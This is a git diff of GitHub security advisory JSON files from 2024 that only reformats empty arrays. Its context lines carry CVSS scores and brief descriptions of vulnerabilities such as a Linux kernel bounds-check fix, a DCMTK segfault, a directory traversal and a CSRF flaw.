index 21176d60e86..0f2a8781141 100644
--- a/advisories/unreviewed/2024/05/GHSA-8gv2-gcw7-7jwv/GHSA-8gv2-gcw7-7jwv.json
+++ b/advisories/unreviewed/2024/05/GHSA-8gv2-gcw7-7jwv/GHSA-8gv2-gcw7-7jwv.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -71,9 +69,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/05/GHSA-8qjm-4vw9-3w5g/GHSA-8qjm-4vw9-3w5g.json b/advisories/unreviewed/2024/05/GHSA-8qjm-4vw9-3w5g/GHSA-8qjm-4vw9-3w5g.json
index 84ded4e46f7..4d358c19a37 100644
--- a/advisories/unreviewed/2024/05/GHSA-8qjm-4vw9-3w5g/GHSA-8qjm-4vw9-3w5g.json
+++ b/advisories/unreviewed/2024/05/GHSA-8qjm-4vw9-3w5g/GHSA-8qjm-4vw9-3w5g.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -63,9 +61,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/05/GHSA-95mq-4jg4-hpq2/GHSA-95mq-4jg4-hpq2.json b/advisories/unreviewed/2024/05/GHSA-95mq-4jg4-hpq2/GHSA-95mq-4jg4-hpq2.json
index 842987c1ff6..59ac7dcf2b0 100644
--- a/advisories/unreviewed/2024/05/GHSA-95mq-4jg4-hpq2/GHSA-95mq-4jg4-hpq2.json
+++ b/advisories/unreviewed/2024/05/GHSA-95mq-4jg4-hpq2/GHSA-95mq-4jg4-hpq2.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -35,9 +33,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/05/GHSA-969w-fmcp-j8rq/GHSA-969w-fmcp-j8rq.json b/advisories/unreviewed/2024/05/GHSA-969w-fmcp-j8rq/GHSA-969w-fmcp-j8rq.json
index 4156e30f2d2..e8a49b9c77f 100644
--- a/advisories/unreviewed/2024/05/GHSA-969w-fmcp-j8rq/GHSA-969w-fmcp-j8rq.json
+++ b/advisories/unreviewed/2024/05/GHSA-969w-fmcp-j8rq/GHSA-969w-fmcp-j8rq.json
@@ -7,12 +7,8 @@
"CVE-2021-47444"
],
"details": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/edid: In connector_bad_edid() cap num_of_ext by num_blocks read\n\nIn commit e11f5bd8228f (\"drm: Add support for DP 1.4 Compliance edid\ncorruption test\") the function connector_bad_edid() started assuming\nthat the memory for the EDID passed to it was big enough to hold\n`edid[0x7e] + 1` blocks of data (1 extra for the base block). It\ncompletely ignored the fact that the function was passed `num_blocks`\nwhich indicated how much memory had been allocated for the EDID.\n\nLet's fix this by adding a bounds check.\n\nThis is important for handling the case where there's an error in the\nfirst block of the EDID. In that case we will call\nconnector_bad_edid() without having re-allocated memory based on\n`edid[0x7e]`.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -32,9 +28,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": null,
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/05/GHSA-9ggc-jprr-xmm8/GHSA-9ggc-jprr-xmm8.json b/advisories/unreviewed/2024/05/GHSA-9ggc-jprr-xmm8/GHSA-9ggc-jprr-xmm8.json
index 2efb0de33a9..8d039c34ad2 100644
--- a/advisories/unreviewed/2024/05/GHSA-9ggc-jprr-xmm8/GHSA-9ggc-jprr-xmm8.json
+++ b/advisories/unreviewed/2024/05/GHSA-9ggc-jprr-xmm8/GHSA-9ggc-jprr-xmm8.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -31,9 +29,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/05/GHSA-cwwf-74gf-jf68/GHSA-cwwf-74gf-jf68.json b/advisories/unreviewed/2024/05/GHSA-cwwf-74gf-jf68/GHSA-cwwf-74gf-jf68.json
index effa5289950..af140f2b0e9 100644
--- a/advisories/unreviewed/2024/05/GHSA-cwwf-74gf-jf68/GHSA-cwwf-74gf-jf68.json
+++ b/advisories/unreviewed/2024/05/GHSA-cwwf-74gf-jf68/GHSA-cwwf-74gf-jf68.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -35,9 +33,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/05/GHSA-f49h-4f4j-3rjc/GHSA-f49h-4f4j-3rjc.json b/advisories/unreviewed/2024/05/GHSA-f49h-4f4j-3rjc/GHSA-f49h-4f4j-3rjc.json
index c9064c862f6..36b76053e4f 100644
--- a/advisories/unreviewed/2024/05/GHSA-f49h-4f4j-3rjc/GHSA-f49h-4f4j-3rjc.json
+++ b/advisories/unreviewed/2024/05/GHSA-f49h-4f4j-3rjc/GHSA-f49h-4f4j-3rjc.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/05/GHSA-f5q9-9qmh-w24h/GHSA-f5q9-9qmh-w24h.json b/advisories/unreviewed/2024/05/GHSA-f5q9-9qmh-w24h/GHSA-f5q9-9qmh-w24h.json
index 4cfa5d1c1ea..fd86d8c1e37 100644
--- a/advisories/unreviewed/2024/05/GHSA-f5q9-9qmh-w24h/GHSA-f5q9-9qmh-w24h.json
+++ b/advisories/unreviewed/2024/05/GHSA-f5q9-9qmh-w24h/GHSA-f5q9-9qmh-w24h.json
@@ -7,12 +7,8 @@
"CVE-2024-34508"
],
"details": "dcmnet in DCMTK before 3.6.9 has a segmentation fault via an invalid DIMSE message.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -32,9 +28,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": null,
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/05/GHSA-fgj9-c4qh-7wrf/GHSA-fgj9-c4qh-7wrf.json b/advisories/unreviewed/2024/05/GHSA-fgj9-c4qh-7wrf/GHSA-fgj9-c4qh-7wrf.json
index 6dcc800ef3f..b8b87a931fe 100644
--- a/advisories/unreviewed/2024/05/GHSA-fgj9-c4qh-7wrf/GHSA-fgj9-c4qh-7wrf.json
+++ b/advisories/unreviewed/2024/05/GHSA-fgj9-c4qh-7wrf/GHSA-fgj9-c4qh-7wrf.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -39,9 +37,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/05/GHSA-gjv4-282p-cm98/GHSA-gjv4-282p-cm98.json b/advisories/unreviewed/2024/05/GHSA-gjv4-282p-cm98/GHSA-gjv4-282p-cm98.json
index 68deaf7f2e7..861ec60d0dd 100644
--- a/advisories/unreviewed/2024/05/GHSA-gjv4-282p-cm98/GHSA-gjv4-282p-cm98.json
+++ b/advisories/unreviewed/2024/05/GHSA-gjv4-282p-cm98/GHSA-gjv4-282p-cm98.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -55,9 +53,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/05/GHSA-h6gr-4677-26p9/GHSA-h6gr-4677-26p9.json b/advisories/unreviewed/2024/05/GHSA-h6gr-4677-26p9/GHSA-h6gr-4677-26p9.json
index e832dd94ff4..14147d60f11 100644
--- a/advisories/unreviewed/2024/05/GHSA-h6gr-4677-26p9/GHSA-h6gr-4677-26p9.json
+++ b/advisories/unreviewed/2024/05/GHSA-h6gr-4677-26p9/GHSA-h6gr-4677-26p9.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -39,9 +37,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/05/GHSA-h93v-cpw2-8m3x/GHSA-h93v-cpw2-8m3x.json b/advisories/unreviewed/2024/05/GHSA-h93v-cpw2-8m3x/GHSA-h93v-cpw2-8m3x.json
index 9e3561f58d8..fc144e6e9df 100644
--- a/advisories/unreviewed/2024/05/GHSA-h93v-cpw2-8m3x/GHSA-h93v-cpw2-8m3x.json
+++ b/advisories/unreviewed/2024/05/GHSA-h93v-cpw2-8m3x/GHSA-h93v-cpw2-8m3x.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -35,9 +33,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/05/GHSA-j37f-whq4-vg6v/GHSA-j37f-whq4-vg6v.json b/advisories/unreviewed/2024/05/GHSA-j37f-whq4-vg6v/GHSA-j37f-whq4-vg6v.json
index 60f175a329e..55c8e0a7a61 100644
--- a/advisories/unreviewed/2024/05/GHSA-j37f-whq4-vg6v/GHSA-j37f-whq4-vg6v.json
+++ b/advisories/unreviewed/2024/05/GHSA-j37f-whq4-vg6v/GHSA-j37f-whq4-vg6v.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -35,9 +33,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "CRITICAL",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/05/GHSA-r6m4-7j2j-qxx2/GHSA-r6m4-7j2j-qxx2.json b/advisories/unreviewed/2024/05/GHSA-r6m4-7j2j-qxx2/GHSA-r6m4-7j2j-qxx2.json
index babecc8d135..55b049b0709 100644
--- a/advisories/unreviewed/2024/05/GHSA-r6m4-7j2j-qxx2/GHSA-r6m4-7j2j-qxx2.json
+++ b/advisories/unreviewed/2024/05/GHSA-r6m4-7j2j-qxx2/GHSA-r6m4-7j2j-qxx2.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -43,9 +41,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/05/GHSA-r868-7jmm-2qf4/GHSA-r868-7jmm-2qf4.json b/advisories/unreviewed/2024/05/GHSA-r868-7jmm-2qf4/GHSA-r868-7jmm-2qf4.json
index 5f62fe69c44..430edc4c5ae 100644
--- a/advisories/unreviewed/2024/05/GHSA-r868-7jmm-2qf4/GHSA-r868-7jmm-2qf4.json
+++ b/advisories/unreviewed/2024/05/GHSA-r868-7jmm-2qf4/GHSA-r868-7jmm-2qf4.json
@@ -7,12 +7,8 @@
"CVE-2024-31394"
],
"details": "Directory traversal vulnerability exists in a-blog cms Ver.3.1.x series versions prior to Ver.3.1.12, Ver.3.0.x series versions prior to Ver.3.0.32, Ver.2.11.x series versions prior to Ver.2.11.61, Ver.2.10.x series versions prior to Ver.2.10.53, and Ver.2.9 and earlier versions. If this vulnerability is exploited, a user with an editor or higher privilege who can log in to the product may obtain arbitrary files on the server.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -28,9 +24,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": null,
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/05/GHSA-rgmg-xvfm-8vfh/GHSA-rgmg-xvfm-8vfh.json b/advisories/unreviewed/2024/05/GHSA-rgmg-xvfm-8vfh/GHSA-rgmg-xvfm-8vfh.json
index 52cf40bad22..3416b62e514 100644
--- a/advisories/unreviewed/2024/05/GHSA-rgmg-xvfm-8vfh/GHSA-rgmg-xvfm-8vfh.json
+++ b/advisories/unreviewed/2024/05/GHSA-rgmg-xvfm-8vfh/GHSA-rgmg-xvfm-8vfh.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/05/GHSA-rj64-24f8-r32g/GHSA-rj64-24f8-r32g.json b/advisories/unreviewed/2024/05/GHSA-rj64-24f8-r32g/GHSA-rj64-24f8-r32g.json
index 882fcc71c54..7ec62e420fc 100644
--- a/advisories/unreviewed/2024/05/GHSA-rj64-24f8-r32g/GHSA-rj64-24f8-r32g.json
+++ b/advisories/unreviewed/2024/05/GHSA-rj64-24f8-r32g/GHSA-rj64-24f8-r32g.json
@@ -7,12 +7,8 @@
"CVE-2021-47495"
],
"details": "In the Linux kernel, the following vulnerability has been resolved:\n\nusbnet: sanity check for maxpacket\n\nmaxpacket of 0 makes no sense and oopses as we need to divide\nby it. Give up.\n\nV2: fixed typo in log and stylistic issues",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -52,9 +48,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": null,
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/05/GHSA-rm96-h83h-vg96/GHSA-rm96-h83h-vg96.json b/advisories/unreviewed/2024/05/GHSA-rm96-h83h-vg96/GHSA-rm96-h83h-vg96.json
index d86f22f6cff..4dfd49b1ec2 100644
--- a/advisories/unreviewed/2024/05/GHSA-rm96-h83h-vg96/GHSA-rm96-h83h-vg96.json
+++ b/advisories/unreviewed/2024/05/GHSA-rm96-h83h-vg96/GHSA-rm96-h83h-vg96.json
@@ -7,12 +7,8 @@
"CVE-2024-35550"
],
"details": "idccms v1.35 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /admin/infoWeb_deal.php?mudi=rev.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -24,9 +20,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": null,
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/05/GHSA-vh53-65cw-j6wx/GHSA-vh53-65cw-j6wx.json b/advisories/unreviewed/2024/05/GHSA-vh53-65cw-j6wx/GHSA-vh53-65cw-j6wx.json
index d8760253bbb..39893c76e43 100644
--- a/advisories/unreviewed/2024/05/GHSA-vh53-65cw-j6wx/GHSA-vh53-65cw-j6wx.json
+++ b/advisories/unreviewed/2024/05/GHSA-vh53-65cw-j6wx/GHSA-vh53-65cw-j6wx.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -31,9 +29,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/05/GHSA-vjf7-9xrv-fjrq/GHSA-vjf7-9xrv-fjrq.json b/advisories/unreviewed/2024/05/GHSA-vjf7-9xrv-fjrq/GHSA-vjf7-9xrv-fjrq.json
index fabafef0e2c..7cdc563595f 100644
--- a/advisories/unreviewed/2024/05/GHSA-vjf7-9xrv-fjrq/GHSA-vjf7-9xrv-fjrq.json
+++ b/advisories/unreviewed/2024/05/GHSA-vjf7-9xrv-fjrq/GHSA-vjf7-9xrv-fjrq.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/05/GHSA-vx2v-mjff-9hjf/GHSA-vx2v-mjff-9hjf.json b/advisories/unreviewed/2024/05/GHSA-vx2v-mjff-9hjf/GHSA-vx2v-mjff-9hjf.json
index d338dcd406e..d43348f6e4b 100644
--- a/advisories/unreviewed/2024/05/GHSA-vx2v-mjff-9hjf/GHSA-vx2v-mjff-9hjf.json
+++ b/advisories/unreviewed/2024/05/GHSA-vx2v-mjff-9hjf/GHSA-vx2v-mjff-9hjf.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -39,9 +37,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/05/GHSA-w3wv-rqfw-m3r7/GHSA-w3wv-rqfw-m3r7.json b/advisories/unreviewed/2024/05/GHSA-w3wv-rqfw-m3r7/GHSA-w3wv-rqfw-m3r7.json
index c084029caf6..4f1b3432863 100644
--- a/advisories/unreviewed/2024/05/GHSA-w3wv-rqfw-m3r7/GHSA-w3wv-rqfw-m3r7.json
+++ b/advisories/unreviewed/2024/05/GHSA-w3wv-rqfw-m3r7/GHSA-w3wv-rqfw-m3r7.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/05/GHSA-wpgm-g43f-rx6f/GHSA-wpgm-g43f-rx6f.json b/advisories/unreviewed/2024/05/GHSA-wpgm-g43f-rx6f/GHSA-wpgm-g43f-rx6f.json
index a9d3f0e693a..ba4628f0e1d 100644
--- a/advisories/unreviewed/2024/05/GHSA-wpgm-g43f-rx6f/GHSA-wpgm-g43f-rx6f.json
+++ b/advisories/unreviewed/2024/05/GHSA-wpgm-g43f-rx6f/GHSA-wpgm-g43f-rx6f.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/05/GHSA-x4xc-qqhc-xfmq/GHSA-x4xc-qqhc-xfmq.json b/advisories/unreviewed/2024/05/GHSA-x4xc-qqhc-xfmq/GHSA-x4xc-qqhc-xfmq.json
index 32f06cd9daf..fcd41d74445 100644
--- a/advisories/unreviewed/2024/05/GHSA-x4xc-qqhc-xfmq/GHSA-x4xc-qqhc-xfmq.json
+++ b/advisories/unreviewed/2024/05/GHSA-x4xc-qqhc-xfmq/GHSA-x4xc-qqhc-xfmq.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/05/GHSA-x9mx-786j-jh4p/GHSA-x9mx-786j-jh4p.json b/advisories/unreviewed/2024/05/GHSA-x9mx-786j-jh4p/GHSA-x9mx-786j-jh4p.json
index a582159bcb2..b98b323fcc8 100644
--- a/advisories/unreviewed/2024/05/GHSA-x9mx-786j-jh4p/GHSA-x9mx-786j-jh4p.json
+++ b/advisories/unreviewed/2024/05/GHSA-x9mx-786j-jh4p/GHSA-x9mx-786j-jh4p.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/05/GHSA-xhf8-m475-367r/GHSA-xhf8-m475-367r.json b/advisories/unreviewed/2024/05/GHSA-xhf8-m475-367r/GHSA-xhf8-m475-367r.json
index 32678356f9a..753d80d75ce 100644
--- a/advisories/unreviewed/2024/05/GHSA-xhf8-m475-367r/GHSA-xhf8-m475-367r.json
+++ b/advisories/unreviewed/2024/05/GHSA-xhf8-m475-367r/GHSA-xhf8-m475-367r.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -31,9 +29,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/06/GHSA-7f54-5cf3-2h2x/GHSA-7f54-5cf3-2h2x.json b/advisories/unreviewed/2024/06/GHSA-7f54-5cf3-2h2x/GHSA-7f54-5cf3-2h2x.json
index fcb303f8e4b..7a726095eaf 100644
--- a/advisories/unreviewed/2024/06/GHSA-7f54-5cf3-2h2x/GHSA-7f54-5cf3-2h2x.json
+++ b/advisories/unreviewed/2024/06/GHSA-7f54-5cf3-2h2x/GHSA-7f54-5cf3-2h2x.json
@@ -17,9 +17,7 @@
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/06/GHSA-852f-crfr-xw8c/GHSA-852f-crfr-xw8c.json b/advisories/unreviewed/2024/06/GHSA-852f-crfr-xw8c/GHSA-852f-crfr-xw8c.json
index 4ff2a3f9bcb..8b8267b9eb3 100644
--- a/advisories/unreviewed/2024/06/GHSA-852f-crfr-xw8c/GHSA-852f-crfr-xw8c.json
+++ b/advisories/unreviewed/2024/06/GHSA-852f-crfr-xw8c/GHSA-852f-crfr-xw8c.json
@@ -17,9 +17,7 @@
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/06/GHSA-fp76-24v2-8wq4/GHSA-fp76-24v2-8wq4.json b/advisories/unreviewed/2024/06/GHSA-fp76-24v2-8wq4/GHSA-fp76-24v2-8wq4.json
index 39309c2044f..dd13e946d7e 100644
--- a/advisories/unreviewed/2024/06/GHSA-fp76-24v2-8wq4/GHSA-fp76-24v2-8wq4.json
+++ b/advisories/unreviewed/2024/06/GHSA-fp76-24v2-8wq4/GHSA-fp76-24v2-8wq4.json
@@ -17,9 +17,7 @@
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/06/GHSA-h8fv-x4w5-c9mc/GHSA-h8fv-x4w5-c9mc.json b/advisories/unreviewed/2024/06/GHSA-h8fv-x4w5-c9mc/GHSA-h8fv-x4w5-c9mc.json
index 0bfbdf08904..8b2551f7b01 100644
--- a/advisories/unreviewed/2024/06/GHSA-h8fv-x4w5-c9mc/GHSA-h8fv-x4w5-c9mc.json
+++ b/advisories/unreviewed/2024/06/GHSA-h8fv-x4w5-c9mc/GHSA-h8fv-x4w5-c9mc.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/06/GHSA-m325-ccpm-cc67/GHSA-m325-ccpm-cc67.json b/advisories/unreviewed/2024/06/GHSA-m325-ccpm-cc67/GHSA-m325-ccpm-cc67.json
index e3850232536..acd8b13a9a3 100644
--- a/advisories/unreviewed/2024/06/GHSA-m325-ccpm-cc67/GHSA-m325-ccpm-cc67.json
+++ b/advisories/unreviewed/2024/06/GHSA-m325-ccpm-cc67/GHSA-m325-ccpm-cc67.json
@@ -17,9 +17,7 @@
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/06/GHSA-mxfh-pj5j-6v79/GHSA-mxfh-pj5j-6v79.json b/advisories/unreviewed/2024/06/GHSA-mxfh-pj5j-6v79/GHSA-mxfh-pj5j-6v79.json
index 04963407dd8..05801881abf 100644
--- a/advisories/unreviewed/2024/06/GHSA-mxfh-pj5j-6v79/GHSA-mxfh-pj5j-6v79.json
+++ b/advisories/unreviewed/2024/06/GHSA-mxfh-pj5j-6v79/GHSA-mxfh-pj5j-6v79.json
@@ -17,9 +17,7 @@
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/06/GHSA-qjcw-jwrw-8fhf/GHSA-qjcw-jwrw-8fhf.json b/advisories/unreviewed/2024/06/GHSA-qjcw-jwrw-8fhf/GHSA-qjcw-jwrw-8fhf.json
index 7e857815c25..d2c1349d435 100644
--- a/advisories/unreviewed/2024/06/GHSA-qjcw-jwrw-8fhf/GHSA-qjcw-jwrw-8fhf.json
+++ b/advisories/unreviewed/2024/06/GHSA-qjcw-jwrw-8fhf/GHSA-qjcw-jwrw-8fhf.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
